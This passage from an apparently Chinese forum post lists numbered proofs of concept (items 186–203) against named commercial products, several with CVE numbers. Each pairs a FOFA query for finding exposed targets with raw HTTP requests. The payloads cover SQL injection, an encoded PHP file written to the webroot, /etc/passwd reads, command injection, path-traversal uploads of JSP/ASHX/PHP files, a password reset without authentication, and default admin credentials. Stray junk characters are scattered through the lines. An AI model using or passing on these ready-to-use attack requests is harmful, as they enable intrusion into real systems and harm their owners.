version < 7.0.5.1- e' r& v) b" \ Z
FOFA:app="REALOR-天翼应用虚拟化系统"
- ]( f7 N; J b. YGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
" G5 ]+ ]7 q) dHost: host
2 A( b$ S3 B* l1 `0 N- E# \) O2 x8 U
( O ^: Y( |7 b7 k, [186. F-logic DataCube3 SQL注入
+ Y3 X( \5 e' H' u8 ^2 @/ dCVE-2024-31750
7 O: V) [9 Y; [3 W1 k6 tF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统- c+ M4 |5 _$ A. s
FOFA:title=="DataCube3"
7 a# H# Y9 V/ E7 JPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
3 K( d- s( K" q1 W7 NHost: your-ip
: X; E" B0 N. Z$ OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0( ~( q4 r* ~: A8 T0 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8% v& q D: O: r! J# B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 g; W9 G ~' L0 ?: J& L% ~3 L8 _Accept-Encoding: gzip, deflate
7 \4 U" f6 T4 ?, k# eConnection: close
# l9 [5 H7 n" hContent-Type: application/x-www-form-urlencoded
, O& H$ k& Z3 t! C) j: p' v6 T; Z' L" |
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450) X3 R* o, S- i. E
6 s+ n% o# n- T% L6 T6 F4 D
# U' I! \! f7 d( M& {
187. Mura CMS processAsyncObject SQL注入
( i: k A9 ?9 _7 BCVE-2024-32640
# E% U7 a8 {5 x0 X9 @! JFOFA:"Mura CMS"9 K: ~9 z6 K) k3 z
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
6 U4 D+ k7 f: _6 KHost: your-ip
: Z- u3 }3 P. _ mContent-Type: application/x-www-form-urlencoded2 L/ {: ?; L+ Z4 J& F* q
; _- n! u. a- o% Y$ U
% W$ A5 l7 S% ^3 wobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1+ ]- V( J! M8 J
" s3 N! A5 ]7 L5 d7 _3 D, s7 Q: E+ d
, p# B5 g$ g' ]% l# ]5 a: C- }5 L9 |7 G188. 叁体-佳会视频会议 attachment 任意文件读取
1 N" e, ~# z8 h4 m5 d) Z7 Y/ w2 uversion <= 3.9.7
! p9 z/ I$ {! {9 CFOFA:body="/system/get_rtc_user_defined_info?site_id"
0 A, |- f. G7 T: @) f: uGET /attachment?file=/etc/passwd HTTP/1.1, g# y, U( ~+ B) n, o
Host: your-ip
5 S: S. u4 f) F% aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 _6 d5 u, J! _6 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ e1 J1 I4 B/ }2 E# d" ?
Accept-Encoding: gzip, deflate
' u6 Z/ R: O3 q6 I, KAccept-Language: zh-CN,zh;q=0.9,en;q=0.83 q# o& Q6 C9 l
Connection: close
4 j; _$ S( k8 d1 K( a1 f5 ]2 V, `7 o5 h% ]
3 Z: ]; c4 G$ r4 z
189. 蓝网科技临床浏览系统 deleteStudy SQL注入+ r& n% J3 D( Y7 [ b
FOFA:app="LANWON-临床浏览系统"
$ k0 |" @' l1 X9 ~' w6 DGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.11 r3 B: o- N$ O* w5 X! A
Host: your-ip/ T: \# Q5 K/ j4 Q# L. v- S, Z8 ^
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! |3 e5 F& G; o( s8 f% U: Y, kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 ?6 t% `, f8 P- K7 B
Accept-Encoding: gzip, deflate
! F9 @! s4 s! M1 h; z/ S. t# eAccept-Language: zh-CN,zh;q=0.9
$ ?& {6 X# \3 K/ DConnection: close
" d M: @( s' z3 n0 P" G1 a/ D# {. O4 m1 `8 \9 G# G7 N/ n
5 U! }5 D( l9 d# }. ]% K7 r+ }
190. 短视频矩阵营销系统 poihuoqu 任意文件读取3 k' i% |& Y" Z, {
FOFA:title=="短视频矩阵营销系统"
H3 z# i2 {) oPOST /index.php/admin/Userinfo/poihuoqu HTTP/2 F$ ?: N/ H# y5 U6 d
Host: your-ip! w; n* n8 O( x) _$ [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
9 q: n& k; j) N( F* I# M: XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- ?/ r9 U1 N% Q! v( a7 ? B* `
Content-Type: application/x-www-form-urlencoded2 c( ^" |) ?9 E
Accept-Encoding: gzip, deflate, ~. L: J; Q' j2 N5 X* z: S
Accept-Language: zh-CN,zh;q=0.9
7 a2 b( }6 k4 J0 j$ I) U( @( k& e, H j4 m+ ~
poi=file:///etc/passwd
6 i6 D0 L0 S f: S! Z$ P0 ?/ k* c: S
C/ e0 @; O9 @: g0 Z Y
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
' x$ W, X, T# N5 X* [FOFA:body="/CDGServer3/index.jsp"
( w B5 p: E( B) @) hPOST /CDGServer3/js/../NavigationAjax HTTP/1.1- _* h* ?9 P6 D
Host: your-ip1 A8 m6 y& d' Q6 z/ Z4 r5 c+ v5 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 G" g" a: X9 kContent-Type: application/x-www-form-urlencoded; o; U6 [* F I) c
) u/ t5 o. r( ?0 Y
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
' E9 x9 e; C" B4 b5 P% v9 b. Z/ M' X8 b( a1 V
. s2 K7 x+ b1 q+ O% y) l+ x192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
9 u; v8 i; I4 T9 y1 o' `FOFA:title="用户登录_富通天下外贸ERP"8 r- G* S2 r! J( n J1 o% W
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1$ q0 @( I* b, I/ ^7 T
Host: your-ip
; q" S$ U2 ^2 m5 Z, v% n* yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# s5 v5 r0 O: ^5 M# T, N) F
Content-Type: application/x-www-form-urlencoded( k3 h8 W/ B ~; Z& w$ H$ z1 x3 O
" S6 B/ i; S6 E- E' q
/ Q0 V! n/ j7 e; M<% @ webhandler language="C#" class="AverageHandler" %>
8 V) A' ]% }- X0 X1 yusing System;
& n- U- Z* ]3 M8 `using System.Web;& i" b- a w% x3 W* H+ _( M
public class AverageHandler : IHttpHandler
/ H4 y, p/ y* J( E+ V{- H) b/ B* O8 T; I* b
public bool IsReusable Q1 ~+ B3 b0 }9 C9 b
{ get { return true; } }
5 x6 B2 l; B: v& r6 Ypublic void ProcessRequest(HttpContext ctx)
* y- }. }* W- A9 Z: E5 w- [{$ |! A7 m$ H7 F$ |- M
ctx.Response.Write("test");( U) J9 @+ k5 c& T$ @! h S& O' K3 P
}
( I" Y3 B. J9 o% U0 `9 G1 e& c}; H( \1 g5 z, a2 ?( [
. O" V1 _; X6 F; B& F; h2 J) B) y9 O2 v* n7 N" ^5 E% J0 x
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行0 W9 R; V% {4 j# ^8 d* I
FOFA:body="山石云鉴主机安全管理系统"# J" n. g' g9 b
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
6 ]( I$ }0 Y8 B. qHost:# _. H+ Q6 L j. V
Cookie: PHPSESSID=2333333333333;+ `- d# z% H- [
Content-Type: application/x-www-form-urlencoded
9 Z- o0 [' P" D6 x5 ]User-Agent: Mozilla/5.0
2 C% \2 b* ~4 [
. q. w2 i% j9 Y0 {+ X3 X% Y: Y' @/ P+ Y9 b# E; t
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
7 g' T& A$ m# M- `& I& F- ?Host:
5 b5 G" L7 v$ f& YUser-Agent: Mozilla/5.06 d- m7 x7 ^, ?% q$ Z
Accept-Encoding: gzip, deflate
, r5 n- `( X7 d- mAccept: */*
$ m& w1 C# E0 U) ^3 `: D! ?, RConnection: close
$ _. l& B: }1 Q. k: R3 q+ [Cookie: PHPSESSID=2333333333333;' Y: O* b# O( h$ q5 q9 C7 a
Content-Type: application/x-www-form-urlencoded
; q9 ^: s1 b: U: B, N1 HContent-Length: 84
5 r7 h3 I/ s) n% U# ?: V8 F; z/ l6 z" B! |. i: [( z0 ^9 _$ c
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
' r; C3 X1 T+ U# W$ @& B( K9 z: w3 X( n: ]& f( U; w
' T4 p7 c4 K- ?8 S0 lGET /master/img/config HTTP/1.1. I& g* {' y* {5 {; J
Host:; k2 A* G9 ]; I- r0 I+ P
User-Agent: Mozilla/5.0& b5 j7 S+ ]1 N, y+ C
) w4 f$ H3 x- d; }2 @6 h# W
7 d* _ n+ A. `* x
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传' ^1 i. n2 U7 M6 m
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
* \3 k m& b8 u3 b0 d, P1 S) l
: N" ]6 l$ `8 KPOST /servlet/uploadAttachmentServlet HTTP/1.1
1 n" ]7 k2 W5 F: R8 HHost: host3 \, w6 c7 a9 M b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36. F0 ` ]# a2 W# H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; O# \; I1 m5 |7 D- E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 j% L' |! q; y
Accept-Encoding: gzip, deflate7 `0 W) k H& e- {3 g
Connection: close
) H |6 X4 u, CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
2 Q4 _7 E& ]9 W" T* Y* n------WebKitFormBoundaryKNt0t4vBe8cX9rZk
" D6 z5 P; h7 @3 k5 n) `' f! x: b
& M$ \) i- h8 T& E" p$ IContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
4 o; ?/ q5 @# q! K# y. HContent-Type: text/plain x/ Q2 f0 a9 s4 n
<% out.println("hello");%>; A' V0 `5 I; `& H; X" ]
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 R# R/ f9 R8 ] b8 AContent-Disposition: form-data; name="json"$ d; M2 z) k( P' Z
{"iq":{"query":{"UpdateType":"mail"}}}9 F" K9 n5 F F! h$ I. U/ A
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--* w% I8 E7 A9 x: R' V4 h3 B
+ Y: R [* ^. v+ o! F' y, P: @# x. k3 N& t3 I h& t6 P8 V
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
& K! t; A m, l3 {& \FOFA:title=="飞鱼星企业级智能上网行为管理系统
+ {* y" J1 a& B. c9 vPOST /send_order.cgi?parameter=operation HTTP/1.1
; O' x; G0 k; vHost: 127.0.0.1
( }3 y/ }! h) v; J4 lPragma: no-cache
2 e3 L* D, u' I' [Cache-Control: no-cache
0 ^* Q# v) Q6 o: _( \1 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 o( J9 T, P( k1 c
Accept: */*' f% C: q# ~5 p8 g$ G( B
Accept-Encoding: gzip, deflate
* |$ C: p5 j* n* X0 sAccept-Language: zh-CN,zh;q=0.9! H: C$ C, E) K5 Z2 [+ l7 c
Connection: close0 {# H0 z+ Q% M8 g6 s
Content-Type: application/x-www-form-urlencoded; K, j, g, c7 @% r0 q; I
Content-Length: 68, o4 S1 t1 ^! e; V* _& d# A: p7 H
' Y. t9 ^* i0 G8 k# |& o6 X' M{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}2 C1 r5 i7 o4 i. L' n' o' B
7 q' ^% l, L" F0 _1 r! _. `
! l. q7 \3 B, B: B
196. 河南省风速科技统一认证平台密码重置
" U5 t% C' f1 v5 S5 bFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
: A; D% o @9 R5 [POST /cas/userCtl/resetPasswordBySuper HTTP/1.1( R7 t0 S6 W) k4 c6 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) n% i2 C0 e$ V: {% d
Content-Type: application/json;charset=UTF-8
, n% y9 }; O' _2 Z2 LX-Requested-With: XMLHttpRequest9 O1 C0 y7 _/ q9 D$ u/ r2 A9 q) b
Host:
( ~3 s5 x0 l2 F' mAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.29 F0 L& x2 K# Q/ _# v1 v& y
Content-Length: 459 f2 p/ q" T# q
Connection: close$ E* B' P, T3 }* q0 a
, h% U3 }: r+ T; u; z{"xgh":"test","newPass":"test666","email":""}* q! a$ o) d' X/ g" o' ^( s) J
- o1 t; R# g( t: u5 r4 @1 g
. H- x+ s. n* q7 Y
/ J' b+ i; Z5 A" Q6 L% e8 R
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
1 E. X- M2 m# @- r3 c% aFOFA:app="浙大恩特客户资源管理系统"
) l/ l) K t& dGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.10 D9 G, ~' V" l% z4 ^) _4 X
Host:
$ ]( c8 O) i8 Z/ CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36; d& r4 v8 x0 {! R; w
Accept-Encoding: gzip, deflate- l4 Z& \" k K; }7 k) S2 v- Y( V
Connection: close1 P0 b5 R0 W7 x( r+ x* A
3 |9 N: X9 ?) g0 y4 |( u( m+ `( Z- H6 e
. A4 _- l) C+ ?: h- K1 ?198. 阿里云盘 WebDAV 命令注入, h+ E; F4 x u* M
CVE-2024-29640
/ h- f4 [* T' p# j, l' ?GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
+ Z' r/ L1 l( jCookie: sysauth=41273cb2cffef0bb5d0653592624cf64- ?: I' ~1 c# \ T
Accept: */*
' [# c9 n4 X0 jAccept-Encoding: gzip, deflate. ?6 C: A/ g( U% S0 P2 k
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6, t; q: ?$ |) R8 L) {" o; {# L
Connection: close7 A6 s' s! p: t( E, D7 ^
! J8 L) d& [( A2 C
+ X! I W2 X9 d$ h' A6 j9 G199. cockpit系统assetsmanager_upload接口 文件上传
- i: f7 Z2 l8 @, S. X' L+ c8 _
1 b- r& b, U& i/ f$ j' Z$ A& _1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:' B2 P% F F- y% \
GET /auth/login?to=/ HTTP/1.1
6 E3 q/ H3 _0 ^6 i5 d
5 q! M& U# E* ?) F响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"' k9 h1 e- e2 L& b
1 f, Q p! v# s' V2.使用刚才上一步获取到的jwt获取cookie:) j* y ?6 c I' I5 L
( k- G+ X3 Q7 Y' Z: lPOST /auth/check HTTP/1.1
+ n0 L; [0 T4 X' iContent-Type: application/json# a1 Z! h# k E( q3 i C5 L
- O, T9 M3 V3 |. P( X
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}# D+ N0 d; j9 T+ R" m4 \7 F; z9 [
6 G! n; ]4 R/ s5 p. L. }( E
响应:200,返回值:: n% I7 u& M" l
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
! V8 |" }9 l7 v9 |Fofa:title="Authenticate Please!": I4 E- z, t* A+ a2 B9 @
POST /assetsmanager/upload HTTP/1.1& t+ u: u; z' c7 ?. t
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3( M* v3 n' }9 y5 t3 N
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
: ^3 N I$ P* L
4 r% Z( \" ]) \- H0 Y9 c2 \2 y-----------------------------36D28FBc36bd6feE7Fb37 Z7 R# t; V" R- L* y
Content-Disposition: form-data; name="files[]"; filename="tttt.php"9 W, O- G2 x5 E. m6 B3 W" m
Content-Type: text/php
8 ~! i7 p9 `5 a4 ~5 K( Q5 \2 N8 L3 h8 z
<?php echo "tttt";unlink(__FILE__);?>
1 R4 `$ p$ V4 K-----------------------------36D28FBc36bd6feE7Fb3. D, M6 e$ F1 p: [2 k. ?: [
Content-Disposition: form-data; name="folder"
0 ?9 G: d! v9 E" I1 z }/ x0 q& B( @! D
-----------------------------36D28FBc36bd6feE7Fb3--, \, S$ m+ i: T; F7 J
) C/ n. v8 f+ J1 ?) \7 r, W! K
/storage/uploads/tttt.php
& l \- I2 r3 m$ v* V2 q1 F/ z `1 n/ |: g5 p0 c
200. SeaCMS海洋影视管理系统dmku SQL注入- [3 R: ?" {6 \; ?5 s' Z, G4 ?1 X
FOFA:app="海洋CMS"
+ p5 b' ]* C/ D) g zGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.19 O5 d0 \2 d' E7 ]$ ]
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
: m% v! j* p9 v A) k0 zUpgrade-Insecure-Requests: 1; @+ r8 E3 ?, d& q+ K& T9 |) e- V, b
Cache-Control: max-age=0' I4 g" a2 y% Q5 ~! v" U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 q- q: s$ z8 }4 e( d- K) }
Accept-Encoding: gzip, deflate
+ @- o1 t% m' k9 C2 M1 J3 YAccept-Language: zh-CN,zh;q=0.93 d( U3 \& p# z5 H2 M
. C3 w4 {* [: k
& D1 @! j7 }; N4 S201. 方正全媒体新闻采编系统 binary SQL注入
3 m8 w( Y" v0 ^* v% x1 k* d1 tFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
* x9 O$ U/ u9 vPOST /newsedit/newsplan/task/binary.do HTTP/1.11 m0 s. k# C8 B4 [6 Q5 x
Content-Type: application/x-www-form-urlencoded
) a$ j/ X8 y) Q5 {7 U8 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! K/ F0 ?9 P, a0 Z# K/ QAccept-Encoding: gzip, deflate; @2 a# M7 X2 o
Accept-Language: zh-CN,zh;q=0.9
% z/ s# u3 e$ ^) l9 M* h; P& {Connection: close
* N' V: k/ ~/ {) V$ z8 r) ?
' u. b& U7 e. y4 X" Z* N oTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=12 W9 Q3 q( g A* \0 S. m
0 `0 {+ @# X% o( e, S& {: R, g" Z6 o# d1 l4 L
202. 微擎系统 AccountEdit任意文件上传
+ Y/ s$ ]8 J3 dFOFA:body="/Widgets/WidgetCollection/"
/ o6 W: z3 _# H) B1 I获取__VIEWSTATE和__EVENTVALIDATION值8 I z' `+ G; x& N4 f' L. V
GET /User/AccountEdit.aspx HTTP/1.1
, p* O6 O0 R; _* GHost: 滑板人之家
9 U/ p$ S2 N$ m8 U0 A/ TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
: v" I1 x r9 `& U% \" w0 _3 P" MContent-Length: 0
$ [6 l! _* x* Y9 Z% J( L$ C7 E$ O
/ @3 K: b& v7 a. w
/ F) c8 r( r) q替换__VIEWSTATE和__EVENTVALIDATION值
6 \! W5 i5 V6 g# K6 Y- oPOST /User/AccountEdit.aspx HTTP/1.1% U( t) s# P$ P1 Z
Accept-Encoding: gzip, deflate, br
6 }2 F4 ~9 m" A! L4 EContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
7 z3 T( R& g7 |: h* D
$ r9 \0 Y2 b( R( X" h( S; h% I-----------------------------786435874t38587593865736587346567358735687' t' F5 h, Z" f. Z$ K7 q2 s
Content-Disposition: form-data; name="__VIEWSTATE"
! l7 c( _. @2 Q8 o. _1 Q# O
" v \- F Y8 n; h+ Y, k__VIEWSTATE4 g3 W4 B5 v# X3 t$ U0 X2 w
-----------------------------786435874t38587593865736587346567358735687
# K; p) I: i- HContent-Disposition: form-data; name="__EVENTVALIDATION"
9 X. w/ t0 i; _7 }( n+ x. V6 `, a3 k/ V7 c
__EVENTVALIDATION
1 `. K9 \2 D, v. ]9 C1 D# D-----------------------------786435874t385875938657365873465673587356876 A3 Y0 U. ~$ [8 k9 z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"; ]" _- E( n9 u m9 F0 I2 P# a0 W
Content-Type: text/plain! S) x8 |( T3 N' G8 y9 x
9 o9 n: [4 _/ t; p- {Hello World!
2 \% |/ o* U+ q1 v' Y-----------------------------786435874t38587593865736587346567358735687
# u8 N3 `" V7 ~9 Z- r+ b2 UContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
# j6 a9 i2 x2 [0 w r5 K4 v; Q) r: J8 H
) K& V1 f8 _' ^7 n4 h上传图片
, z3 {1 g- \/ t/ ~* i-----------------------------786435874t38587593865736587346567358735687) `# @, `3 Z+ C/ k4 K7 r, Z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( A7 K& j' N4 j! r8 a. A% {" x2 a" r' [' t$ A# b* G* u: w. ?, j
5 W1 p' T( ^. Q-----------------------------786435874t385875938657365873465673587356871 ?5 o) l9 y" {1 t+ y& {
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
* ^0 G" w. B* x, @ O+ |5 u" f( Q( k7 X7 a) V
$ |* o3 \ _) I- G0 S& N; @) a
-----------------------------786435874t38587593865736587346567358735687--0 d! d1 [1 D3 n: b2 F& l2 J0 @
% u( J# Y& L& G& A( q x
2 U. y2 i' O* b5 r/_data/Uploads/1123.txt; d2 h! m# A+ w. }
) ^. M- ~9 g3 U' J2 _8 }- _
203. 红海云EHR PtFjk 文件上传
! q# N5 o" s5 `) \; J4 \5 rFOFA:body="RedseaPlatform"
- b" e# s0 T: ~ yPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1! u& B% W8 ^. y/ P% q9 ^ Y; O
Host: x.x.x.x
4 o! h: x) ?- jAccept-Encoding: gzip
0 b5 U& e5 t* v) P7 K0 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* @( n9 n0 _7 E% JContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
, f( Q, O& {9 X" p: CContent-Length: 210
( ~* ?! s6 r& J3 `; w7 {- T8 N- g& ~! x3 u3 p
------WebKitFormBoundaryt7WbDl1tXogoZys4
& G0 a8 F4 V0 ?) `" \Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
0 ^ O" D9 p! ?6 s# h8 J( k# y" dContent-Type:image/jpeg& F) Y" R+ j. l) ]# H
4 W- N% M! D# J1 p, Z9 e0 u
<% out.print("hello,eHR");%>
8 o6 m) h5 |( s% d( w------WebKitFormBoundaryt7WbDl1tXogoZys4--3 ~) {$ A1 a6 m: _$ Q+ Z" Q
( [% Z9 H8 X* d2 _
m" V! v& h7 m) d9 w8 M$ p1 D! f, t( g" T/ J1 v
; y' R( e7 i9 `3 v, Q1 O( H
q; W/ p" d n0 Y0 P1 w$ I* T& k& f2 Z8 I# C
|
发表于 2024-6-5 14:31:29